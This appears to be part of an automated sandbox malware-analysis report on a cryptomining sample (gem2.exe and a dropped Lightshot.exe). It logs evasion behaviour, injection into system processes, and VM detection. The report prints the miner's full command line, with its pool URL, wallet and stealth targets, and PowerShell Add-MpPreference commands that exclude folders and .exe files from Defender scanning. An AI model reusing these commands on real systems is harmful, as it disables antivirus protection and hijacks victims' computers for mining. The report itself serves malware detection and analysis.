Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F685000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DIALER.EXE--ALGO=RX/0--URL=POOL.SUPPORTXMR.COM:80--USER=46M39DM1DQJFKUNT3T2KIHNU6QQJMRF79J31FSBTBNAFUX9B2GAWYSJLFADQ5MHQR4M6C8JJRFXWLPXDHAPUCRHE3MRBJTW--PASS=ULTIMA--CPU-MAX-THREADS-HINT=20--CINIT-WINRING=YYCJBDWXJAOE.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.0--CINIT-IDLE-WAIT=10--CINIT-IDLE-CPU=80--CINIT-ID=IKZKMIIBPWTVHLGB
Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F727000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2438700274.000001DD5F718000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2438873553.000001DD5F726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEEY
Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F710000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2438700274.000001DD5F718000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXEEAST
Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F685000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE!
Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F727000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000002.3310862683.000001DD5F685000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2438700274.000001DD5F718000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2438873553.000001DD5F726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4424
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5363
Source: C:\Windows\System32\winlogon.exe | Window / User API: threadDelayed 8580
Source: C:\Windows\System32\winlogon.exe | Window / User API: threadDelayed 1418
Source: C:\Windows\System32\lsass.exe | Window / User API: threadDelayed 9927
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2246
Source: C:\Windows\System32\dwm.exe | Window / User API: threadDelayed 9872
Source: C:\Windows\System32\dialer.exe | Window / User API: threadDelayed 1817
Source: C:\ProgramData\Screenshots\Lightshot.exe | Dropped PE file which has not been started: C:\Windows\Temp\yycjbdwxjaoe.sys
Source: C:\Windows\System32\lsass.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_36-14953
Source: C:\Windows\System32\svchost.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_40-14927
Source: C:\Windows\System32\dialer.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_23-480
Source: C:\Users\user\Desktop\gem2.exe | API coverage: 8.3 %
Source: C:\Windows\System32\lsass.exe | API coverage: 6.6 %
Source: C:\ProgramData\Screenshots\Lightshot.exe | API coverage: 8.3 %
Source: C:\Windows\System32\svchost.exe | API coverage: 5.1 %
Source: C:\Windows\System32\dialer.exe | API coverage: 1.2 %
Source: C:\Windows\System32\svchost.exe | API coverage: 4.8 %
Source: C:\Windows\System32\svchost.exe | API coverage: 5.1 %
Source: C:\Windows\System32\svchost.exe | API coverage: 5.1 %
Source: C:\Windows\System32\svchost.exe | API coverage: 6.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408 | Thread sleep count: 4424 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408 | Thread sleep count: 5363 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 8180 | Thread sleep count: 8580 > 30
Source: C:\Windows\System32\winlogon.exe TID: 8180 | Thread sleep time: -8580000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 8180 | Thread sleep count: 1418 > 30
Source: C:\Windows\System32\winlogon.exe TID: 8180 | Thread sleep time: -1418000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 6576 | Thread sleep count: 9927 > 30
Source: C:\Windows\System32\lsass.exe TID: 6576 | Thread sleep time: -9927000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6728 | Thread sleep count: 7352 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3628 | Thread sleep count: 2246 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5016 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4996 | Thread sleep count: 243 > 30
Source: C:\Windows\System32\svchost.exe TID: 4996 | Thread sleep time: -243000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 2820 | Thread sleep count: 9872 > 30
Source: C:\Windows\System32\dwm.exe TID: 2820 | Thread sleep time: -9872000s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 7656 | Thread sleep count: 1817 > 30
Source: C:\Windows\System32\dialer.exe TID: 7656 | Thread sleep time: -181700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7784 | Thread sleep count: 253 > 30
Source: C:\Windows\System32\svchost.exe TID: 7784 | Thread sleep time: -253000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3292 | Thread sleep count: 253 > 30
Source: C:\Windows\System32\svchost.exe TID: 3292 | Thread sleep time: -253000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7844 | Thread sleep count: 253 > 30
Source: C:\Windows\System32\svchost.exe TID: 7844 | Thread sleep time: -253000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7840 | Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 7840 | Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\sc.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\dialer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe | Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe | Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe | Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe | Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe | Code function: 29_2_000001E85898DCE0 FindFirstFileExW, 29_2_000001E85898DCE0
Source: C:\Windows\System32\lsass.exe | Code function: 36_2_00000140AE86DCE0 FindFirstFileExW, 36_2_00000140AE86DCE0
Source: C:\Windows\System32\svchost.exe | Code function: 40_2_00000195DD5CDCE0 FindFirstFileExW, 40_2_00000195DD5CDCE0
Source: C:\Windows\System32\dwm.exe | Code function: 41_2_000001160CBEDCE0 FindFirstFileExW, 41_2_000001160CBEDCE0
Source: C:\Windows\System32\svchost.exe | Code function: 66_2_00000257E10ADCE0 FindFirstFileExW, 66_2_00000257E10ADCE0
Source: C:\Windows\System32\svchost.exe | Code function: 67_2_000001F28C93DCE0 FindFirstFileExW, 67_2_000001F28C93DCE0
Source: C:\Windows\System32\svchost.exe | Code function: 68_2_000001CA9854DCE0 FindFirstFileExW, 68_2_000001CA9854DCE0
Source: C:\Windows\System32\svchost.exe | Code function: 69_2_000001D26531DCE0 FindFirstFileExW, 69_2_000001D26531DCE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicshutdownNT SERVICE
Source: dialer.exe, 00000040.00000002.3307064888.0000020E96570000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: "NAy0{ht|GmYv;Yv&\z`yf`2{h0|3JAP[nX*[Csk9xUUPdBmsAEBO'`NK[YwmVL@dECrcyjxc|wGn~k}yc_BqA(k:F1"2?=n/vmCI^Hj_nX?Dx~#YBS/bASD
Source: dialer.exe, 00000040.00000002.3307064888.0000020E96570000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: _E(;`o1=_Un[=qRa!%^LCS3KoB~d9Ar/W[(cIjxxiWfzo_@$}?rna[.KDc`Z{>Xquh^b~zQ@52IFvovMCIU?!J9kie?cc[B A?iFficLJKgg~=/
Source: lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicvssNT SERVICE
Source: dialer.exe, 00000040.00000002.3307064888.0000020E96570000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: 3Qg+@y9[b_E?a_pEpVkIzd1<PHza&Fc^S.QV@3ky2wVBDPbgr]FZPrlyH8rgof[}lN|ZUe`eLJn|qdYmYN\&zo~va?w%&_|ppM=Jz5c>dO3z]y[`9|=#}IZDD?7f{@cB{R]c)xj{9dPgl&|bhMN|@Xye8>-K:%c#_tdapBpgbFf>SrzCYS{#|r1auX3H{%YCD"Y*/v`9vNT|^SsYAr{[zw=`x>S=&%|F@(ifZQ`>VGrz0{MXhY?q}FG8NUL=NPa&LX@TCDF<AKii:yvs:)Q`cY=ZO"Xaa~s$S,'<zxmya<@yA~<gLtYGxtKnB>HgFsFV_Rqz{*1Eaw`lE<c$l(p%Lxp_RAPaZ 8liiAt}7]TY?UIDPc]i)d% u=VUE;aX@XnFjxx@5le2kxcMyp]otRPVVA>LH3a"yaMoi<a@vEgY;V|q%cQ9B\as1J}9&Xgof^vlSFa{6?#C5lC9@/}G_kcnn`=NILaSZAN[)e|}v|'tkO
Source: dialer.exe, 00000040.00000002.3307064888.0000020E96570000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: LwX<m=KcPysmP1DqVmciT?uHP`UbgXM'|oG8EHAi|r#'y5YGpx{h1Hc`z"Ex|y\^C.dmDw:{l%EvAqYyOC:>Qg1}Adv?x^yuNELySH7CmvoYfV\xkVOxO[Mj[vSn@`oyJyZmQCAxov{U@Y9QsiOmrZ[[dPTzAno"U5K;JeDg]z#l%Mn [XR}A9A:EBcDXPaAi78IlIgoBrYlh(}\mry[HKuOHf<]cKY`AEKCiclhCN{YGjj8TWyjQck]o{VsFtX#u2q8YwWw?RZG8P08zY8Jk"nhDCby@wCq
Source: dialer.exe, 00000040.00000002.3307064888.0000020E96570000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: MP^1J^bijiXU}bRWCW|SG^z]v90[%?LcJ]{9|HgfSf&fd"_{8Y-INaF4)J?Ru]GrMJPP:IMjciXayz9vjdKyN>QnZf~<&v2cDWUS8Y6<Hdj b$knoFlmFiqHe8LU.FlnJURBD?kWf
Source: svchost.exe, 00000028.00000000.2101662137.00000195DD66A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F649000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000002.3310862683.000001DD5F6A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000044.00000002.3308159885.000001CA97800000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicheartbeatNT SERVICE
Source: dialer.exe, 00000040.00000002.3307064888.0000020E96570000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Uc8w[ncYRpnosipO.~YeN1B\_V#SM<}(X|JfN6vK$<"PQKYR1{88CKeyb]{FoZb|Fk9K{3d?/V @p9W@0M`Zeh7[[DFgs[A+RgV2DhvG{/gN5[KC1oFpdvZ\%[f%C>}VJ?=Mte{{"|m>}QJCWlzQ<3@>fc-_jp%*Wluh|0DSTZ?HI>\Ik`<D?68KySG<izpZLN<FxK}Fg]y;Bd}]3aaG;1[bVMCIc\P}kaNmezyJTrY!xQqN*GdTwuHF$[Si+Z$}18kTl1=KCXEXm'|Jr?fpXEbb&VvlBc!RPcel^NjhGb|nj}Gl*ak9{AwmS{Zy10r|9'DQUTM&ECP^KqQ}0pYgEvWDU{eR`f`sWNMiTL>
Source: dwm.exe, 00000029.00000002.3321516925.0000011607ED0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: PointVMware&P
Source: dwm.exe, 00000029.00000002.3321516925.0000011607ED0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000=
Source: lsass.exe, 00000024.00000002.3309813323.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096574533.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.3309549964.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.2101503020.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.3318145585.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000043.00000000.2135584024.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000044.00000000.2137364654.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000044.00000002.3308442354.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: dwm.exe, 00000029.00000002.3321516925.0000011607ED0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: C:\Windows\System32\dialer.exe | API call chain: ExitProcess graph end node graph_23-413
Source: C:\Windows\System32\dialer.exe | API call chain: ExitProcess graph end node graph_62-468
Source: C:\Windows\System32\dialer.exe | API call chain: ExitProcess graph end node graph_65-91
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\winlogon.exe | Code function: 29_2_000001E858987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_000001E858987D90
Source: C:\Windows\System32\dialer.exe | Code function: 65_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 65_2_00000001408460F0
Source: C:\Windows\System32\dialer.exe | Code function: 23_2_00000001400017EC GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree, 23_2_00000001400017EC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\gem2.exe | Code function: 0_2_00007FF72A7B118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 0_2_00007FF72A7B118B
Source: C:\Users\user\Desktop\gem2.exe | Code function: 0_2_00007FF72A7B11D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 0_2_00007FF72A7B11D8
Source: C:\Windows\System32\winlogon.exe | Code function: 29_2_000001E858987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_000001E858987D90
Source: C:\Windows\System32\winlogon.exe | Code function: 29_2_000001E85898D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_000001E85898D2A4
Source: C:\Windows\System32\lsass.exe | Code function: 36_2_00000140AE867D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_00000140AE867D90
Source: C:\Windows\System32\lsass.exe | Code function: 36_2_00000140AE86D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_00000140AE86D2A4
Source: C:\ProgramData\Screenshots\Lightshot.exe | Code function: 37_2_00007FF6E4D8118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 37_2_00007FF6E4D8118B
Source: C:\ProgramData\Screenshots\Lightshot.exe | Code function: 37_2_00007FF6E4D811D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 37_2_00007FF6E4D811D8
Source: C:\Windows\System32\svchost.exe | Code function: 40_2_00000195DD5CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_00000195DD5CD2A4
Source: C:\Windows\System32\svchost.exe | Code function: 40_2_00000195DD5C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_00000195DD5C7D90
Source: C:\Windows\System32\dwm.exe | Code function: 41_2_000001160CBED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001160CBED2A4
Source: C:\Windows\System32\dwm.exe | Code function: 41_2_000001160CBE7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001160CBE7D90
Source: C:\Windows\System32\dialer.exe | Code function: 64_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 64_2_0000000140001160
Source: C:\Windows\System32\svchost.exe | Code function: 66_2_00000257E10AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 66_2_00000257E10AD2A4
Source: C:\Windows\System32\svchost.exe | Code function: 66_2_00000257E10A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 66_2_00000257E10A7D90
Source: C:\Windows\System32\svchost.exe | Code function: 67_2_000001F28C937D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 67_2_000001F28C937D90
Source: C:\Windows\System32\svchost.exe | Code function: 67_2_000001F28C93D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 67_2_000001F28C93D2A4
Source: C:\Windows\System32\svchost.exe | Code function: 68_2_000001CA9854D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 68_2_000001CA9854D2A4
Source: C:\Windows\System32\svchost.exe | Code function: 68_2_000001CA98547D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 68_2_000001CA98547D90
Source: C:\Windows\System32\svchost.exe | Code function: 69_2_000001D265317D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 69_2_000001D265317D90
Source: C:\Windows\System32\svchost.exe | Code function: 69_2_000001D26531D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 69_2_000001D26531D2A4

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\gem2.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\Screenshots\Lightshot.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\gem2.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\Screenshots\Lightshot.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: 1E858950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\lsass.exe base: 140ADFC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 195DD590000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 1160CB80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: 1E8589B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\lsass.exe base: 140AE890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 195DE1A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 1160CBB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 257E1070000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1F28C1D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1CA97FD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D2652E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 254A27A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 24B87DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 205FB3C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1A205670000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 18EC1F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 25CE3BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 26238950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2786E560000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1611FF70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 27C0F350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1B279570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1E70A460000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 22D13110000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 22C8C580000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2825F1D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 20BAEC90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1C782530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\spoolsv.exe base: A60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 24066EB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 181CEDB0000 protect: page execute and read and write
